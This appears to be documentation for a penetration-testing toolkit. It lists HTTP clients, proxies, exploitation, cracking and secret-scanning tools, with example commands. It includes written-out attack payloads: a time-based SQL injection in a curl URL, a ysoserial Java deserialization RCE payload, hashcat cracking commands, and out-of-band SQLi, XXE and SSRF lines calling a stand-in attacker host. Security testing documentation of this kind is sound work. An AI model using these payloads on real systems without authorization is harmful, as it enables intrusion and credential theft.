Exploitation & Testing Tools¶

HTTP Clients & Proxies¶

cURL¶

Standard: Linux/macOS/Windows Purpose: Core HTTP client for PoC execution

# Basic request
curl -X POST https://api.example.com/api/v1/users \
  -H "Authorization: Bearer TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"email":"test@example.com","role":"admin"}'

# With timing
curl -w "Response time: %{time_total}s\n" \
  "https://api.example.com/api/v1/users?sort=name' AND SLEEP(5)"

Advantages: - ✅ Universal (everywhere) - ✅ Scriptable - ✅ Supports all HTTP methods - ✅ Cookie/header management

HTTPie¶

GitHub: httpie/httpie Purpose: User-friendly HTTP client

More readable than cURL for manual testing.

http POST https://api.example.com/api/v1/users \
  Authorization:"Bearer TOKEN" \
  email=test@example.com \
  role=admin

Advantages: - ✅ Syntax closer to natural HTTP - ✅ Better formatting - ✅ Color-coded output - ✅ JSON auto-detection

Burp Suite Pro¶

GitHub: PortSwigger Purpose: Industry-standard web proxy and testing suite

Manual testing, request modification, and intercception.

Features: - Proxy intercception - Repeater (modify and resend requests) - Intruder (automated fuzzing) - Scanner (automated vulnerability detection) - Burp AI Agent (AI-powered testing with 53 MCP tools)

Integration: BeDefended uses Burp as proxy via --proxy flag

/pentest https://api.example.com --proxy 127.0.0.1:8080

Caido¶

GitHub: caido Purpose: Modern alternative to Burp, faster and lighter

Web proxy with modern UI.

Features: - Fast proxy - Request replay - Parameter extraction - 47 CLI commands

Integration: Similar to Burp proxy integration

Exploitation Tools¶

YSOSerial¶

GitHub: frohoff/ysoserial Purpose: Java deserialization gadget chain generator

Generate malicious serialized objects for Java RCE.

docker run --rm -v $(pwd):/work pentest-tools \
  java -jar /opt/ysoserial/ysoserial.jar \
  CommonsCollections5 'touch /tmp/pwned' \
  | base64

Gadget Chains: - CommonsCollections (all versions) - Spring Framework - Rome library - JNDI injection payloads

Output: Base64-encoded serialized object for exploitation

Hashcat¶

GitHub: hashcat/hashcat Purpose: GPU-accelerated password cracking

Crack hashes using dictionary, brute-force, and rule-based attacks.

docker run --rm -v $(pwd):/work pentest-tools \
  hashcat -m 0 -a 0 \
  hashes.txt \
  wordlist.txt \
  --force

Modes: - -m 0: MD5 - -m 1400: SHA-256 - -m 3200: bcrypt - -m 13100: PBKDF2-SHA256

Speed: Billion+ hashes/second on GPU

Crunch¶

GitHub: crunch (various implementations) Purpose: Wordlist generator

Generate custom wordlists based on patterns.

docker run --rm -v $(pwd):/work pentest-tools \
  crunch 8 8 -t "admin@@@" -o wordlist.txt

Pattern Options: - @ — Lowercase letter - , — Uppercase letter - % — Digit - ^ — Special character

Interactsh (Out-of-Band Testing)¶

Interactsh Client¶

GitHub: projectdiscovery/interactsh Purpose: Detect SSRF, blind XXE, blind SQLi using out-of-band channels

Generate unique interaction endpoints for detecting hidden vulnerabilities.

docker run --rm -v $(pwd):/work pentest-tools \
  interactsh-client -poll

Use Cases: 1. Blind SQLi Detection: SELECT LOAD_FILE('\\\\attacker.interactsh.com\\share') 2. Blind XXE: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.interactsh.com/xxe">]> 3. SSRF Verification: curl http://attacker.interactsh.com/ssrf 4. CNAME Records: Create CNAME→Interactsh for DNS rebinding

Output:

Listening for interactions...
Interaction #1
  Type: HTTP
  URL: http://abc123.interactsh.com
  Method: GET
  User-Agent: curl/7.64.1

Scanning & Testing Frameworks¶

Testssl.sh¶

GitHub: drwetter/testssl.sh Purpose: TLS/SSL configuration scanner

Comprehensive SSL/TLS testing.

docker run --rm -v $(pwd):/work pentest-tools \
  testssl.sh --full https://example.com

Checks: - Protocol versions (SSLv2, SSLv3, TLS 1.0, 1.1, 1.2, 1.3) - Cipher suites - Key exchange strength - Certificate validation - HSTS, OCSP stapling, etc.

Secret Management¶

Trufflehog¶

GitHub: trufflesecurity/trufflehog Purpose: Detect secrets in code repositories

Scans git history, files, and credentials.

docker run --rm -v $(pwd):/work pentest-tools \
  trufflehog filesystem /work/source-code

Detects: - API keys (GitHub, AWS, Stripe, etc.) - Private keys (SSH, PGP) - Database credentials - OAuth tokens

GitLeaks¶

GitHub: gitleaks/gitleaks Purpose: Git secret scanning

Scans git repositories for secrets.

docker run --rm -v $(pwd):/work pentest-tools \
  gitleaks detect --source /work/repo --verbose

API Testing¶

Swagger/OpenAPI Validation¶

Tool: Integrated into discovery phase Purpose: Validate API specifications

Some apps expose /swagger.json or /openapi.json revealing all endpoints.

curl https://api.example.com/swagger.json | jq '.paths | keys'

Summary Table¶

Tool	Purpose	Use Case
cURL	HTTP client	Every PoC
HTTPie	Friendly HTTP client	Manual testing
Burp Suite	Web proxy + testing	Comprehensive testing
Caido	Modern web proxy	Fast proxy work
YSOSerial	Java RCE payload gen	Deserialization RCE
Hashcat	Password cracking	Hash cracking
Interactsh	OOB detection	Blind vulnerability verification
Testssl.sh	SSL/TLS testing	Certificate/cipher analysis
Trufflehog	Secret scanning	Source code secret detection
GitLeaks	Git secret scanning	Repository secret detection